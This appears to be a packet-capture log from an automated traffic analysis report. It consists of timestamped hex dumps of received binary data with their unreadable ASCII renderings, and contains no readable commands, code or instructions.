                                                                                                                                                                                2023-08-23 07:28:58 UTC27INData Raw: 79 47 08 7f be 58 c9 32 68 b9 5f a1 a4 8a a7 d5 c3 91 8e 01 63 a2 09 65 91 9a ac 6d 7e 9b ef 66 ff d4 11 55 b1 7f d2 18 75 a2 f7 3f d9 95 ac 26 1e d0 d3 05 fa 4d e6 ce a4 25 3f 49 d5 03 fe d9 f2 1e 33 22 2d dc b0 62 10 df 02 c0 c7 b7 65 73 90 5b a0 2e 1e c2 8c ad ab 3e de 79 b1 c9 b4 b6 93 a1 36 88 56 df 80 b9 73 62 a5 32 57 be 16 80 06 32 13 6d 1a c3 89 53 7b c9 3b df 46 ae 5a ae 5c 47 98 0d 13 b7 81 86 f4 8d 2c 77 09 86 0f 50 ae 32 71 2c ff 1b ac b0 a5 b8 bf 60 36 b0 fb 70 48 ca 5a c6 de 86 31 90 f7 c3 3e de 81 73 66 bc d3 de 44 93 f9 d3 cf 60 51 40 b5 f1 6e de ae 76 ae b2 6e 13 89 69 18 2f e5 a0 ed 3e 2e c5 49 a5 f9 1c ae 3c 1a d0 3a 0a 77 ec a5 1d 9c 20 20 af 01 e6 87 66 21 1a 5d 4f fe 04 56 6b 92 2c 29 3b 36 82 be 9f 1f 15 9c b0 7a b7 14 30 37 fe 55
                                                                                                                                                                                Data Ascii: yGX2h_cem~fUu?&M%?I3"-bes[.>y6Vsb2W2mS{;FZ\G,wP2q,`6pHZ1>sfD`Q@nvni/>.I<:w f!]OVk,);6z07U
                                                                                                                                                                                2023-08-23 07:28:58 UTC29INData Raw: ad de fe 17 ad 55 91 a4 00 ae 3c 39 d1 3a 0a aa f6 c5 dc df 60 21 ff 8c 6b 96 98 55 90 00 aa 88 83 db b9 07 d0 4c 44 b0 d5 ec fc ba 73 10 0e d9 3a 18 b5 a0 62 d7 ec cd 76 9b a9 30 1e a0 2c 09 55 b0 ab 57 c0 ec 9d a5 66 5c cf 1e 5b 99 f3 4a 0e 2c 9b 80 65 c6 52 bc 79 55 a7 e5 79 c6 05 73 26 d2 2e 96 b3 71 a4 27 a5 ce 63 a8 74 cd 13 08 dd bf 57 8b ee 54 5a 22 78 eb 96 26 e2 11 65 3e fa 27 4d f8 b8 14 4e c1 24 9a a5 5e 70 a3 f0 2d 3b 5c f0 5a a3 7e e9 e6 3a 34 f0 85 16 a8 66 ac 8e 90 37 26 83 10 21 89 7d ae 37 53 f1 61 1a 76 71 fb 0d 1d 10 43 65 3d a0 1e c3 c2 68 27 4c a2 2f ce 94 3a eb e0 ea 35 36 e2 9d b7 b0 11 14 20 f0 00 3e df f0 d1 21 07 42 06 4b 6d 74 ef f1 4d 12 d3 d4 0f a2 d9 1e b4 9f fa 07 9e a0 22 e0 e8 97 b4 97 dc e3 3e 32 f5 d0 24 37 0b 87 d1 29
                                                                                                                                                                                Data Ascii: U<9:`!kULDs:bv0,UWf\[J,eRyUys&.q'ctWTZ"x&e>'MN$^p-;\Z~:4f7&!}7SavqCe=h'L/:56 >!BKmtM">2$7)
                                                                                                                                                                                2023-08-23 07:28:58 UTC30INData Raw: 6c 35 ef c8 97 d9 ab 7b 0b d6 04 a5 5a 25 c8 41 1a 4f ee b0 99 41 ff 6e 4a 3d 82 e2 29 4f 39 9d 59 d1 c7 f4 75 b7 3c 7e e7 c9 8b 1c ee b4 cf b9 2c 37 0b 5a 34 8a b4 d9 64 d7 77 a1 fe 31 e7 ed a3 51 1c 88 2a a1 68 59 16 ff c9 8e 64 d6 92 9c 20 96 31 b0 86 33 30 e6 c0 c1 06 e0 81 63 3f c8 ba 92 e9 21 05 67 02 31 02 b9 55 10 41 0b 8a 90 5e 96 bf 50 1a 4d 82 34 a2 b1 dc fd 20 41 a0 fe 13 d8 8c 0d 1b 69 f9 2f bf d3 70 84 64 0a 11 3f 49 68 6e 43 00 5a 66 3e 70 48 09 66 26 bc d0 57 67 22 a3 9b b0 30 fc 9a dd 83 61 e9 f7 0a f0 ee 53 f4 bb 83 14 24 ee 3c 60 f7 b1 aa 7d 8f 55 89 a8 c0 7e 9d 11 a7 e5 f3 b8 05 93 b3 d6 e3 ab 8b 62 53 52 7c cd 71 e8 80 f7 4f d4 79 e6 1b 60 38 c1 03 04 f8 75 e3 f9 77 c2 93 b3 e6 2d 3e dc f1 af 67 4a 93 b8 25 98 14 d0 7f e0 c8 05 c3 62
                                                                                                                                                                                Data Ascii: l5{Z%AOAnJ=)O9Yu<~,7Z4dw1Q*hYd 130c?!g1UA^PM4 Ai/pd?IhnCZf>pHf&Wg"0aS$<`}U~bSR|qOy`8uw->gJ%b
                                                                                                                                                                                2023-08-23 07:28:58 UTC31INData Raw: 1e d8 98 29 b6 bd cc d6 83 c4 87 c1 2a 29 df 7c aa 04 ff 20 90 9c 38 e3 e7 06 db 2c 72 52 1e 89 d9 33 48 7a b5 a1 76 a3 c8 72 65 38 8b 0f 97 8c e2 1c 1b af 18 9b 94 1f 36 dd 11 aa f0 1d 2f e1 97 a7 bd 4e af 24 b0 49 1d 58 22 4e 10 d5 8d 04 ac e1 0f 9f b3 78 2e 1a f3 a8 53 24 75 51 5d 51 bb ee 57 58 51 94 9b f7 e7 e6 60 fc 12 26 14 46 10 39 a3 7a 38 bb ff 3f 54 39 20 bc 98 f2 9e 9f 45 82 02 52 3b cd 5c af 49 a4 64 53 47 aa 91 5f 80 31 52 ed 66 a6 27 57 57 e7 f2 da 50 79 00 06 0b 1e 92 fc a3 b6 0f 2a a6 65 ab d2 25 d5 15 d4 7f de 5b 95 ed ac 56 ea ba 63 c5 13 95 3b 73 07 4c 12 d2 64 89 0e 02 ea 98 94 5e 5d 5d 6d 2c 98 a7 b4 4c 26 62 e2 f4 af b6 f7 95 67 75 a9 fa 85 5c 00 73 85 9a 36 a0 c2 9a 36 27 39 e1 42 68 fd 60 c0 f5 b3 eb 98 9e 73 14 eb 0c a6 7c 96 80
                                                                                                                                                                                Data Ascii: )*)| 8,rR3Hzvre86/N$IX"Nx.S$uQ]QWXQ`&F9z8?T9 ER;\IdSG_1Rf'WWPy*e%[Vc;sLd^]]m,L&bgu\s66'9Bh`s|
                                                                                                                                                                                2023-08-23 07:28:58 UTC32INData Raw: 8e 26 2a 44 b7 6f a2 37 38 d4 6b 30 6f b1 21 76 24 e9 11 f5 e0 ae 09 aa 8c c1 78 ec b9 22 0c 64 49 aa 2a 1c 30 ed d4 d0 4c 6d fe 98 15 bb 79 ad 62 13 a7 76 26 a0 f0 c0 c1 9d dd ed b5 b3 8c 8e f5 5a 75 4b 63 fd 0e 17 5a 39 fe 97 ff ae 3d 16 9a 98 81 60 f7 9a f6 56 39 14 cc 1f ee 80 d3 17 13 64 e3 7b f5 9f 96 9c 02 32 f1 43 cf 2f b5 6d c8 89 8c cf 8c 49 02 13 b2 6d af a3 aa a4 9b 26 21 10 7b d4 5e 44 dc 50 44 68 e4 22 2d 4b ac ba b3 62 f4 94 42 93 19 d1 93 a5 c1 84 b2 fd f4 29 69 18 35 61 09 bf 0d c8 fc f9 07 ec ac a6 ab 8b ca 46 6d be 04 c1 52 9f e4 f1 68 39 90 19 21 91 e9 1e 3f b2 8d 1e 64 89 ea 8d 7b 62 b1 b0 a9 b0 9e b4 08 31 41 e0 f9 1c 73 95 3e ea 72 96 be fa 14 b7 5c 69 eb e2 a1 f1 27 6c 07 05 de ac df 70 cd 31 61 86 1a 36 ed 85 ee d5 d9 05 b0 31 1a
                                                                                                                                                                                Data Ascii: &*Do78k0o!v$x"dI*0Lmybv&ZuKcZ9=`V9d{2C/mIm&!{^DPDh"-KbB)i5aFmRh9!?d{b1As>r\i'lp1a61
                                                                                                                                                                                2023-08-23 07:28:58 UTC33INData Raw: 9c fb 10 75 cc f9 b0 8b 58 d9 cb ef c4 12 a7 73 9c be 98 05 e6 36 e4 20 aa 65 79 15 b4 70 f3 49 18 0a ff de f2 fd 91 dd 97 6d 89 1d 18 54 24 4a 00 1c eb 6d 0b e7 33 17 01 4e fc 44 4d a2 b4 98 de 30 82 5b a2 11 82 94 32 6a 9d e5 6a 87 00 50 d0 de 3a 32 de f9 38 ea 27 2e 50 fd ad a6 e9 6c 5e 47 ff 4d e6 8e 5d 1e 93 f1 6d 82 b4 12 bb 80 66 2e a6 dd a8 31 2b e0 1e c3 81 f2 a5 47 81 46 58 64 24 2d 51 63 c2 37 5d bb f0 ea 2b 30 83 d4 36 5b b8 da 03 83 72 4d 24 97 89 bf 9f 60 c8 c5 48 7b e3 b1 06 46 fe 76 f8 50 52 af 09 8b 90 65 52 42 27 7e 3f 6a 2a 89 84 0c e5 06 0c 98 2f 98 27 6f 74 66 c7 93 f5 67 ea f6 f1 a5 49 ac 5f 1e d0 01 9b e1 19 bb 52 e8 66 9e 35 49 dd ad 15 57 38 47 bf 4a df 0b eb 9b 10 f0 8e 8e ba 70 b8 ca f4 58 bc 78 5c 92 09 d7 fa 03 2e 3a 51 9c d7
                                                                                                                                                                                Data Ascii: uXs6 eypImT$Jm3NDM0[2jjP:28'.Pl^GM]mf.1+GFXd$-Qc7]+06[rM$`H{FvPReRB'~?j*/'otfgI_Rf5IW8GJpXx\.:Q
                                                                                                                                                                                2023-08-23 07:28:58 UTC35INData Raw: e8 f2 7c 53 f7 37 65 54 74 98 eb 95 bb 37 46 4e 40 47 38 17 fd 40 92 00 f1 89 4d b3 c8 0b 65 53 c1 4d cf db fc 53 f6 ff dc 79 f1 df 6a 19 2f ba 2f ae d4 d4 e8 a7 89 e9 b0 0b 2b 36 7e ff 28 e5 d6 e6 91 54 b6 38 ae 68 10 be 56 19 c4 74 09 1a 0c f4 5a ae 57 9c c4 99 72 f6 37 89 c4 98 f9 4f a7 77 70 b4 fe ce ff 90 e9 9a 18 41 d7 7d e2 5b 77 35 13 96 8b bd 5f 99 4e 93 b2 5f 44 12 93 4c c4 c9 69 0a 04 85 31 45 5f 5e a0 c5 11 07 41 3e f0 09 76 73 00 ac 59 af 7d ca f5 37 93 b8 fa 35 df cf 58 30 d7 c0 be 5c c5 01 10 6b 4b 37 8f bf f0 f5 4c 9c a1 07 ef 4e d4 05 a1 a8 87 59 3d 89 50 9e f1 23 2a 3b 46 39 9a 85 9b 7a c3 92 bd a3 33 52 bd f9 cd cf 31 a4 84 bb 35 24 f6 76 72 d4 c6 0e 10 43 e6 f9 58 3c 5c d8 a8 fb 7f 72 f4 55 6a da e8 a8 ed 3b a1 a1 6c 4f ca a2 35 3b b5
                                                                                                                                                                                Data Ascii: |S7eTt7FN@G8@MeSMSyj//+6~(T8hVtZWr7OwpA}[w5_N_DLi1E_^A>vsY}75X0\kK7LNY=P#*;F9z3R15$vrCX<\rUj;lO5;
                                                                                                                                                                                2023-08-23 07:28:58 UTC36INData Raw: e9 74 52 60 99 dc 5f 54 76 a7 94 cc fa 5b 18 a1 8b f5 b4 71 0e 73 ac 58 30 d4 3f 5f 98 ed a5 60 65 6f 80 68 51 0f e8 eb ce 65 5e 0f 8f f4 9a 80 3d e2 65 c3 8d ee f8 c4 7b 62 8e c7 e5 10 be ca c5 e3 7e ba aa c4 45 aa 32 f0 6f 1c 1d 40 c5 a8 70 0c 9b 0c 93 90 17 f0 31 de 5f e1 09 b0 17 68 dd 5b 92 c2 b9 30 89 cd 08 53 a1 ae f9 20 e6 31 62 52 45 6a 65 1f 75 f8 fc 92 60 a6 50 f6 de 24 34 a6 77 44 60 c0 83 7c 32 d7 a6 ed e6 22 02 20 7b 9a e0 de 70 b5 40 a2 87 45 65 0b 60 4d b6 53 e4 fb ba b5 da ce 02 e2 d3 f0 0a 21 f6 f6 45 f8 83 11 44 27 01 95 16 9e 9e eb 51 9f 66 ff 34 35 5e dc e9 be b8 8d 0b 36 7f d0 11 63 d8 f5 2a c7 b1 58 a0 fb fe ad 05 9e a2 e5 24 b3 b2 89 2d eb 23 5c 6c fe ee 0d 27 e0 40 c2 f0 e9 9b 7f f1 a8 f0 9a e7 cb 5b 3d 57 08 ec 96 5b 11 4c 3a 2b
                                                                                                                                                                                Data Ascii: tR`_Tv[qsX0?_`eohQe^=e{b~E2o@p1_h[0S 1bREjeu`P$4wD`|2" {p@Ee`MS!ED'Qf45^6c*X$-#\l'@[=W[L:+
                                                                                                                                                                                2023-08-23 07:28:58 UTC37INData Raw: de 3d 28 e3 eb 34 b5 6f 2e 0f b9 c6 56 dd 83 29 9f f7 0a f0 8f 71 1d 33 de 27 69 bf fa fd 27 48 e3 71 b6 f5 dc 1d a1 83 34 06 25 02 ac b9 6f 18 4b 8b 9e b4 11 db 60 42 d9 9f 73 e9 d3 a1 a7 ec 79 eb 4b 5c d0 70 7b f5 a8 a0 cf 70 b7 03 9c b0 53 21 54 dc 2b 7f 2f dc d6 b9 72 a6 0b a9 2f 2d 9b dd ee 13 14 52 06 da 51 05 2f ee a0 48 e7 af d5 a4 14 51 b3 c3 ad 04 96 e9 f1 e0 b4 74 fe c6 f7 b5 82 71 5b 92 0e c8 98 d6 e3 2e 6e 91 e4 b3 94 d2 41 cb 40 85 77 cf a1 9b c1 4a e8 45 4c 12 5e d1 0e 0c ff c7 14 2f fc 47 7c 24 ec 9f 3d 0a 0d 36 3a f4 6c 5f 86 e9 65 d4 8c b8 a5 2f 88 44 23 bc 95 14 ef 9e dd a8 f0 2e f6 ea ca 18 8f 2e 12 05 df 94 8f 1d f6 6c 2b 2b 50 d5 5b de b1 f2 d6 6c fd d8 21 27 a0 6f 03 f3 65 f4 3e 4b c3 e1 c0 50 f9 06 20 85 ac 1b 82 a2 35 62 9c ef 07
                                                                                                                                                                                Data Ascii: =(4o.V)q3'i'Hq4%oK`BsyK\p{pS!T+/r/-RQ/HQtq[.nA@wJEL^/G|$=6:l_e/D#..l++P[l!'oe>KP 5b
                                                                                                                                                                                2023-08-23 07:28:58 UTC38INData Raw: 82 e0 e4 9c 51 09 c2 44 8e de ce 89 55 a2 49 a0 66 58 24 df 29 2e 5d 8a 60 76 99 5d 58 88 6b 8f 35 b7 64 c7 0f 49 31 8a d4 80 0e 9f eb 5e 1b ad aa 09 eb 3c c5 7a 8e f4 92 3e 36 07 bf ae b0 67 48 19 b4 4e 50 2e e4 8c c3 1b cd a0 14 e8 bc 5f 6d 00 32 e4 c4 50 38 98 8e cc ca ba 2d c5 a9 20 d2 75 2c 34 e8 3e d6 e8 ce d4 e5 e8 3e 86 cc 0a 7d 3e 34 99 9d 9e c8 80 ff 73 5a 85 13 ff 25 e8 80 ce 9c 79 2a cd 55 6c 7d 63 ef 09 83 40 18 c0 9a 8a 2d 19 42 7e 82 cb 0e 51 4f 9d e5 6e 75 79 f9 dc b5 9a 7b 76 bc 5b 7b 7d df ad a2 20 7a 2c 3f e0 a6 b9 23 da 5a ec e9 21 5b c0 51 62 90 14 6b 09 b3 68 6d 7e 68 cd 50 9b c7 fe 2e 91 b3 a6 cd 14 fe 78 94 1d 30 b4 08 14 02 67 06 70 40 c3 9f c5 f7 24 54 11 a5 7e 9d e1 c7 eb b8 e7 77 5f 73 b1 b5 5f 2b 7b 11 71 91 9b 52 c1 f9 b2 93
                                                                                                                                                                                Data Ascii: QDUIfX$).]`v]Xk5dI1^<z>6gHNP._m2P8- u,4>>}>4sZ%y*Ul}c@-B~QOnuy{v[{} z,?#Z![Qbkhm~hP.x0gp@$T~w_s_+{qR
                                                                                                                                                                                2023-08-23 07:28:58 UTC40INData Raw: 63 da 7d 00 c1 61 97 48 6a 7c bc 84 13 85 d4 9c d4 a3 12 7d 77 bd 48 54 be 5d 5c 5a 5d 4b 02 e4 79 bb 64 a3 b6 63 5f b1 6c 75 5d 10 08 1e 49 fb 94 bc 90 ab 39 ce 3b cd 14 ac 54 f5 11 6a 9c be 13 f9 9f 75 73 4b 3f 5a 78 9e f1 13 37 fb 1b 09 3c 07 b4 21 ff 20 63 6d 89 15 91 d8 f1 44 47 1e 0f bb 8a 3a 60 30 8b ab 66 02 b2 13 c3 12 49 89 cf 4c 7e 8a ef 99 a3 60 fb 66 12 19 02 5f bc e0 0a 33 de f9 ce 2a a4 d7 51 44 ad d6 62 eb f4 76 fe c3 32 cc 29 6e ae 0b 46 07 f0 ad e5 90 66 c6 fa bc a4 61 93 73 06 2a d5 5c 60 43 57 5e 63 64 ea e9 05 e8 b3 bc 12 e2 f1 d9 ef b0 4a c8 0c d4 ee de 09 fc 8f d1 ed 89 0b 7d 18 0e f5 34 7b 92 b5 6e ea bf a6 42 7e 58 69 53 83 b6 9f b9 05 92 37 c0 b7 b5 5e 85 04 ee 83 85 30 50 a1 e5 bf 7b 74 66 5c 8b 15 30 e2 1f 31 f7 92 be 4f 14 94
                                                                                                                                                                                Data Ascii: c}aHj|}wHT]\Z]Kydc_lu]I9;TjusK?Zx7<! cmDG:`0fIL~`f_3*QDbv2)nFfas*\`CW^cdJ}4{nB~XiS7^0P{tf\01O
                                                                                                                                                                                2023-08-23 07:28:58 UTC41INData Raw: 2c c3 b3 ec 85 ba 90 6e 3f 01 01 f8 71 f7 90 28 eb 8b 3a 97 67 17 c9 56 0e b1 a2 d9 4c c1 f6 6e 53 07 db 60 4a 6d 7f f9 22 bc 80 f7 72 ee 17 7e b5 19 fb b7 1c 38 0c 12 2f 25 14 0c b7 3b 5d 71 f4 b8 89 58 ab fb 69 17 5d 07 c9 07 90 61 c6 45 52 ea cb 6b 37 ae 27 88 2e 5e 52 89 35 7d 76 5b 68 dc d8 9a 05 92 4e 60 d2 b7 43 fc 99 b1 ea a8 72 19 f3 31 e7 19 69 92 33 61 ce 74 00 1b 18 c8 2c d0 6b 92 ef 1d 05 2b f4 d0 b8 78 b2 bc b2 f7 8a 0d dc 9c 9e fb 49 60 93 be 91 00 21 02 04 86 ec 6b fd 5a ed a4 b6 66 9a 58 4d 6f ac c2 c5 11 f5 ef 47 c9 3b d8 6e 65 9c be f3 e3 49 a8 97 6f e4 b1 05 e8 5b 53 39 f6 29 fd 92 b9 ff 84 cb eb 60 b5 a7 99 bc e5 b3 90 81 1f 0b be 3b 0e ce bd 40 b8 e7 6e 4f 4d 81 0e 98 6b d6 d8 b0 9a 9b dd 6a 72 ea 9b 75 4d 66 05 a7 1b dc 24 3b ee 5e
                                                                                                                                                                                Data Ascii: ,n?q(:gVLnS`Jm"r~8/%;]qXi]aERk7'.^R5}v[hN`Cr1i3at,k+xI`!kZfXMoG;neIo[S9)`;@nOMkjruMf$;^
                                                                                                                                                                                2023-08-23 07:28:58 UTC42INData Raw: 62 57 9c 11 ac a3 da 63 4a ef d7 e1 9d c5 0d 4d d1 c7 3b 79 55 89 cf a4 02 a3 54 a7 d3 34 f6 65 1f 6c 7e 6d 3f 5c 40 ae 7e 6a a1 f2 52 9b d3 73 51 fd 51 71 05 67 8f da 82 c9 19 04 2f f1 30 7c 71 9f df 56 01 06 32 1f c6 06 f9 b0 e9 dc 5f e8 73 bb 7a 70 95 1f df de 23 18 66 62 7c c1 e9 6e eb 29 04 3e b7 92 04 f3 d3 4b d2 a5 1a 4f 85 31 96 7b 38 72 50 7a 0f af 8f 97 32 90 fe 83 90 4b 16 cf 6a 29 e3 cc 55 65 ae 36 71 d1 cf 10 31 04 6f bf 3f 56 38 47 eb 92 07 40 54 36 f6 da 9a 03 0d bc be c6 eb 6f d6 c0 68 53 ba 21 96 17 49 37 51 72 b9 60 2d cc f9 61 6c 97 4a e9 62 45 d9 a3 40 67 87 a2 20 43 88 93 25 2b 09 54 4e b4 5e 64 0e e5 8c 48 99 36 47 a7 26 09 89 6f 85 39 60 e6 e1 71 fa 2f bf 58 66 de 66 c4 75 67 7a b3 b1 ad 8e 50 66 3e 15 b2 d2 9b d9 ca 65 a1 3e 72 2a
                                                                                                                                                                                Data Ascii: bWcJM;yUT4el~m?\@~jRsQQqg/0|qV2_szp#fb|n)>KO1{8rPz2Kj)Ue6q1o?V8G@T6ohS!I7Qr`-alJbE@g C%+TN^dH6G&o9`q/XffugzPf>e>r*
                                                                                                                                                                                2023-08-23 07:28:58 UTC43INData Raw: e9 75 6f 08 0a 6d 44 f2 1a 25 23 c8 10 18 f9 2b 6a c3 8f b9 ac e3 48 e7 22 d1 aa 7f 2c 13 0b 17 70 6a 62 2c 5b 83 6e fe 5b 30 d6 f8 ea 6b 9b 32 53 66 45 40 7d 7c 2e c9 fc b1 56 4c 2e 96 db f7 0a 73 a3 06 df 8c 06 a3 ad b3 90 9d e1 ed a1 3e 36 33 85 fd d4 c1 35 65 f1 9b aa b9 05 f0 b4 c0 6f e6 7c b4 96 27 d8 9f 6c c4 0f 70 0b 79 3c ea 1b 60 38 c0 5d 05 f8 7d a9 79 f9 02 9c 53 c6 01 ee 29 10 29 ad 41 c2 3b b4 ec b5 66 6f 95 9b 56 10 2b 8b fc 46 26 41 0c f8 34 ef ca b6 31 24 82 73 97 bb ab 38 df f7 ff 89 c4 b5 74 a8 c7 49 ce c0 71 5b 11 47 5d a2 af 8c f1 04 91 b5 75 11 2e e0 6a e4 0e 7a 49 4a 74 22 94 36 e3 00 24 2b 0a 6c 51 06 5c 5c 24 a8 cc 1b 3a 57 bb bc 14 77 dc c8 0b 3e 32 9a b3 15 57 bf 25 54 d1 77 bb 07 3c 16 81 52 92 56 dd f8 d9 6d 49 f7 fc 9d 58 33
                                                                                                                                                                                Data Ascii: uomD%#+jH",pjb,[n[0k2SfE@}|.VL.s>635eo|'lpy<`8]}yS))A;foV+F&A41$s8tIq[G]u.jzIJt"6$+lQ\\$:Ww>2W%Tw<RVmIX3
                                                                                                                                                                                2023-08-23 07:28:58 UTC44INData Raw: 5f 64 4e a9 b3 6f db b5 7e d3 3d 65 e3 20 89 4d 14 ee af d0 09 ce c1 be b1 d9 53 03 24 9d 12 8f 29 ed ee 01 01 92 b2 9f ef 9a 1a 98 63 7d df a8 96 8b fb d1 7e 9a 58 4f 4a 51 6f 5e 3c 9f a3 cd a1 e9 a2 f0 3e ac 48 fc d8 d6 a7 c6 05 e8 cb f2 7b 4b 77 cb a7 da 0d 74 4b bb be 49 44 90 29 cd 64 a7 97 4d 59 2f 3a 2b 6a c4 ac 8f 76 b1 e9 a9 6d ac ed 2c ca 07 86 90 82 a4 2a cc c9 53 3a 80 d3 2b c5 50 36 26 88 cb 11 6e 7d d2 64 fb 83 9d c3 32 fc f9 5c 65 ce 2b 1a 48 a8 68 0c d3 82 c1 00 d1 d3 8e 3c 42 94 96 52 dc f2 bc c2 f0 f6 14 82 98 f2 0b 0d bc 1c 3e 09 63 96 41 7b 12 87 0f f6 9b 83 58 d2 46 43 d3 a6 b3 b4 89 71 88 f9 dc 36 dd 32 5f e1 44 8a af b9 24 ff 84 ac 62 1b ff d7 cc 0d af 0f da 60 db a6 3f f8 be d7 ff e9 d6 de 8b b6 80 97 75 6e f0 2e bd 5e 78 61 1b 08
                                                                                                                                                                                Data Ascii: _dNo~=e MS$)c}~XOJQo^<>H{KwtKID)dMY/:+jvm,*S:+P6&n}d2\e+Hh<BR>cA{XFCq62_D$b`?un.^xa
                                                                                                                                                                                2023-08-23 07:28:58 UTC46INData Raw: 67 07 69 fa 4e f6 6a cd 1b c7 84 b4 5f 28 a4 69 d5 a6 ff b9 92 4b 76 5f 44 2c 6c 5a 62 a5 39 ae 34 79 3c 15 9a 08 41 d4 98 9b 56 98 93 40 a1 07 1c 75 72 b6 97 7a 6c 75 35 10 15 48 3e e8 66 b0 29 ab 88 7e aa 5c e5 db bb ed de bd 3c 85 b5 b8 30 d1 d8 1b 5a f4 d0 7c 56 c7 84 d5 e5 f7 12 ac 49 16 c7 31 4f 87 7e 79 9f 3b 77 2b 96 69 1c cc 9a b0 b2 a6 b3 6e ae 91 47 e0 af e2 fb 01 37 59 2d 3e f4 34 9f 92 76 1d 1d 14 f9 d1 4f 14 f7 20 c7 be b1 82 ac dd ea 0c f0 ed 3f ed 8e 47 76 88 f7 9a 6e 94 3f 82 c8 2e 06 12 58 bb 67 05 22 01 d6 41 28 f6 2d 87 b9 76 d5 ca ae de ec 61 2e 8c 37 0d a0 36 e0 f1 4d 9a 04 f5 17 1c 2e 0e 95 f1 ac e2 03 09 35 18 0a 21 85 70 8e e7 4a 2c 5f e0 34 3f 62 fd 29 bf 08 50 b3 ad c3 f0 32 a3 5a 55 9e 32 35 3d a5 99 02 f6 c5 57 82 c1 ab 19 b8
                                                                                                                                                                                Data Ascii: giNj_(iKv_D,lZb94y<AV@urzlu5H>f)~\<0Z|VI1O~y;w+inG7Y->4vO ?Gvn?.Xg"A(-va.76M.5!pJ,_4?b)P2ZU25=W
                                                                                                                                                                                2023-08-23 07:28:58 UTC47INData Raw: 21 c2 6a 99 d1 2d d4 ac ea dc 1a d8 49 f6 75 62 b3 55 5c 93 ec ad b8 40 e0 38 78 da f1 36 50 ac b9 c1 e7 3e d5 ab 2a 09 a6 fa 4e 2a 5e 4d 6d 54 1c 55 b7 bb 90 e5 63 5c 5d f8 a7 23 10 ba 5f f3 11 1b 76 c8 6b 3b 8c ea 1f 2a ea 93 a0 6e 73 07 db e8 3d 70 bd 30 56 a8 03 c1 30 e2 9c f1 f4 65 a7 34 67 e6 8b dd 3e a3 ea b5 f7 3b 5d 7e 42 c8 b3 99 d6 5a 74 98 7a 8a 08 5b 20 41 f9 7b 83 25 b3 36 85 2a af 0f 36 37 06 e3 5a 12 87 16 2e 51 9c 27 c4 a5 81 c5 8d 47 27 77 e7 f1 52 81 66 3d ae 7f ba 55 2b f6 13 a0 27 1d bf 1b 44 f8 2f 9f af a9 c7 de ac 42 36 9d 38 a5 43 04 b4 89 d6 d7 cc 90 4d 59 15 92 9c 83 9a ef a5 f9 aa 1f 27 d1 b8 bd ee 9f 1e e9 10 28 14 92 b0 16 f2 37 33 68 86 fa 2f 5a 9c 1d 8f 05 4b 24 7e 02 e9 0f 7e df 01 d7 ec 70 21 98 fd 8b c9 44 b7 e6 1f 8d 38
                                                                                                                                                                                Data Ascii: !j-IubU\@8x6P>*N*^MmTUc\]#_vk;*ns=p0V0e4g>;]~BZtz[ A{%6*67Z.Q'G'wRf=U+'D/B68CMY'(73h/ZK$~~p!D8
                                                                                                                                                                                2023-08-23 07:28:58 UTC48INData Raw: b4 ea 88 b9 e1 68 27 be e4 a1 94 a2 a6 e6 26 4c dd a3 af bd c1 25 3f c9 f9 89 15 6a 1b d9 4a 40 87 31 f4 e7 5a 31 cc a1 98 1a 66 75 09 30 31 d0 8c b9 fc 1c 1a 34 ce 14 ef c7 2c 55 41 0a ad fc c0 8c 59 42 c8 48 c2 70 b3 df a1 2c 49 9b 79 10 ce 38 d4 a1 9f 56 7c 64 61 be b1 df 89 18 da 9a 2f 0f e2 31 22 90 90 23 a1 ec ed 06 6b 35 5d 9d 73 af 5a 83 fd a6 5a e9 4f 2c f4 1b 26 57 87 b4 cc 30 94 10 69 32 26 08 99 9d d5 2b 64 43 31 e9 84 3a ad 51 8c a3 55 7b c7 af 15 f9 34 76 b6 cc a4 07 50 95 f0 50 d6 a8 30 cd f5 7c 6f 5c e2 0b 69 e9 50 9e d6 20 b6 7b 70 de 91 6e 09 0b d9 49 22 3c c6 eb 42 16 49 e9 8d 4f 15 dc fa 9f 62 a9 12 6f 9d 6a 84 c8 e0 0d ad 6b ee 13 03 c1 00 69 b3 19 b4 b9 d8 6e 5f 39 3e 42 b5 06 31 d9 fa 98 88 47 67 21 42 bd 25 d4 75 6f 5c 30 76 e9 f6
                                                                                                                                                                                Data Ascii: h'&L%?jJ@1Z1fu014,UAYBHp,Iy8V|da/1"#k5]sZZO,&W0i2&+dC1:QU{4vPP0|o\iP {pnI"<BIObojkin_9>B1Gg!B%uo\0v
                                                                                                                                                                                2023-08-23 07:28:58 UTC49INData Raw: c2 0e b0 f0 52 8f 1f c8 91 62 6a 86 c3 e3 06 ae ba c7 4d 4e b5 95 b1 f4 e2 3c 82 0d e4 29 1d 28 43 64 1b bc 63 f1 37 0c b3 7e 26 9b 50 74 41 8a fa 5e 1d 66 8a b7 ee f8 2e 00 f1 bd 84 47 24 40 67 cd bf e3 60 fb 9a ad a4 ca 50 be ce eb 15 49 84 31 a0 39 2b 75 25 62 0d 34 ab e2 d6 25 ce ef 85 b9 26 13 38 e3 7d b5 91 5f 32 eb f1 93 0a 37 22 f6 30 32 b2 a4 cb 30 aa c9 df 1c a6 e0 43 3f 66 be 9a a3 17 e8 cc a9 af f1 70 ec 4b d2 6e d5 95 55 57 13 e1 14 5f ed 09 b3 4e a7 0e 31 70 70 d4 8f 0d 0a 4f fe a4 31 f0 81 65 15 6b 29 8d dd 91 2c 44 b8 cf cc 75 cb a5 8a 18 cb 70 42 10 2f 93 c6 cf 9f 95 bb 70 7b 2d 68 64 6b 39 b4 90 36 3a c6 e9 8f 6e 51 ee 96
                                                                                                                                                                                Data Ascii: RbjMN<)(Cdc7~&PtA^f.G$@g`PI19+u%b4%&8}_27"020C?fpKnUW_N1ppO1ek),DupB/p{-hdk96:nQ
